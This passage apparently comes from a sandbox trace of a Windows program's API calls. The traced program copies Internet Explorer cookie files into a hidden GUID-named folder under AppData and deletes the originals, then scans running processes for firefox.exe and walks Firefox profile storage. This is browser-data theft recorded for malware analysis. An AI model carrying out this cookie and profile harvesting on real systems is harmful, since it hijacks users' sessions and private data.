(lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0253.183] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0253.183] StrChrW (lpStart="Y1I415YS.txt", wMatch=0x74c005c) returned 0x0 [0253.183] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="Y1I415YS.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\Y1I415YS.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\Y1I415YS.txt" [0253.183] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\Y1I415YS.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\y1i415ys.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\Y1I415YS.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\y1i415ys.txt"), bFailIfExists=0) returned 1 [0253.188] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\Y1I415YS.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\y1i415ys.txt")) returned 1 [0253.189] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0253.189] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0253.189] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0253.189] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0253.189] StrChrW (lpStart="Low\\Y3XU5OKR.txt", wMatch=0x74c005c) returned="\\Y3XU5OKR.txt" [0253.189] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0253.189] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0253.189] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0253.189] StrChrW (lpStart="Y3XU5OKR.txt", wMatch=0x74c005c) returned 0x0 [0253.189] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="Y3XU5OKR.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\Y3XU5OKR.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\Y3XU5OKR.txt" [0253.189] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\Y3XU5OKR.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\y3xu5okr.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\Y3XU5OKR.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\y3xu5okr.txt"), bFailIfExists=0) returned 1 [0253.194] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\Y3XU5OKR.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\y3xu5okr.txt")) returned 1 [0253.195] lstrlenA (lpString="firefox.exe") returned 11 [0253.195] mbstowcs (in: _Dest=0x7aae670, _Source="firefox.exe", _MaxCount=0xc | out: _Dest="firefox.exe") returned 0xb [0253.195] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x8e4 [0253.199] Process32FirstW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.201] lstrcmpiW (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0253.201] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x66, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0253.202] lstrcmpiW (lpString1="System", lpString2="firefox.exe") returned 1 [0253.202] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0253.204] lstrcmpiW (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0253.204] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0253.205] lstrcmpiW (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0253.205] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x190, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x188, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0253.207] lstrcmpiW (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0253.207] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x188, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0253.208] lstrcmpiW (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0253.208] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0253.209] lstrcmpiW (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0253.209] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0253.211] lstrcmpiW (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0253.211] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1b8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0253.212] lstrcmpiW (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0253.213] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.214] lstrcmpiW (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.214] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.215] lstrcmpiW (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.215] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1b0, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0253.217] lstrcmpiW (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0253.217] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x1f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.218] lstrcmpiW (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.218] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x354, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.220] lstrcmpiW (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.220] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.221] lstrcmpiW (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.221] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.222] lstrcmpiW (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.222] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.224] lstrcmpiW (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.224] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.225] lstrcmpiW (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.225] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0253.227] lstrcmpiW (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0253.227] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x4a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.229] lstrcmpiW (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.229] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.230] lstrcmpiW (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.230] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0253.232] lstrcmpiW (lpString1="OfficeClickToRun.exe", lpString2="firefox.exe") returned 1 [0253.232] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.233] lstrcmpiW (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.233] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0253.235] lstrcmpiW (lpString1="sihost.exe", lpString2="firefox.exe") returned 1 [0253.235] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0253.236] lstrcmpiW (lpString1="taskhostw.exe", lpString2="firefox.exe") returned 1 [0253.236] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x834, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x39, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0253.237] lstrcmpiW (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0253.237] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x244, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0253.239] lstrcmpiW (lpString1="RuntimeBroker.exe", lpString2="firefox.exe") returned 1 [0253.239] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x9b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x244, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0253.240] lstrcmpiW (lpString1="ShellExperienceHost.exe", lpString2="firefox.exe") returned 1 [0253.240] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xa08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x244, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0253.242] lstrcmpiW (lpString1="SearchUI.exe", lpString2="firefox.exe") returned 1 [0253.242] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x244, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0253.301] lstrcmpiW (lpString1="backgroundTaskHost.exe", lpString2="firefox.exe") returned -1 [0253.301] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xbf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0253.303] lstrcmpiW (lpString1="cmd.exe", lpString2="firefox.exe") returned -1 [0253.303] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xad8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xbf0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0253.304] lstrcmpiW (lpString1="conhost.exe", lpString2="firefox.exe") returned -1 [0253.305] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="makecab.exe")) returned 1 [0253.306] lstrcmpiW (lpString1="makecab.exe", lpString2="firefox.exe") returned 1 [0253.306] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x200, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0253.308] lstrcmpiW (lpString1="conhost.exe", lpString2="firefox.exe") returned -1 [0253.308] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x200, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0253.309] CloseHandle (hObject=0x8e4) returned 1 [0253.309] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0253.309] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x7aaeab0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 0x0 [0253.309] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming", lpString2="\\Mozilla\\Firefox\\Profiles\\*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*" [0253.310] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*", lpFindFileData=0x44dfcc0 | out: lpFindFileData=0x44dfcc0) returned 0x44306b0 [0253.310] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*") returned 64 [0253.310] FindNextFileW (in: hFindFile=0x44306b0, lpFindFileData=0x44dfcc0 | out: lpFindFileData=0x44dfcc0) returned 1 [0253.310] FindNextFileW (in: hFindFile=0x44306b0, lpFindFileData=0x44dfcc0 | out: lpFindFileData=0x44dfcc0) returned 1 [0253.310] lstrcpyW (in: lpString1=0x79cd460, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0253.310] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpString2="8i341t8m.default" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default" [0253.310] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", lpString2="\\storage\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\" [0253.310] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage")) returned 0x10 [0253.310] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\") returned 88 [0253.310] PathCombineW (in: pszDest=0x79c85d0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\", pszFile="*.*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\*.*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\*.*" [0253.310] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\*.*", lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 0x442fe10 [0253.310] FindNextFileW (in: hFindFile=0x442fe10, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0253.310] FindNextFileW (in: hFindFile=0x442fe10, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0253.310] lstrlenW (lpString="permanent") returned 9 [0253.310] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\", pszFile="permanent" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent" [0253.310] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent") returned 97 [0253.310] PathCombineW (in: pszDest=0x7aae530, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent", pszFile="*.*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\*.*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\*.*" [0253.310] FindFirstFileW (in: 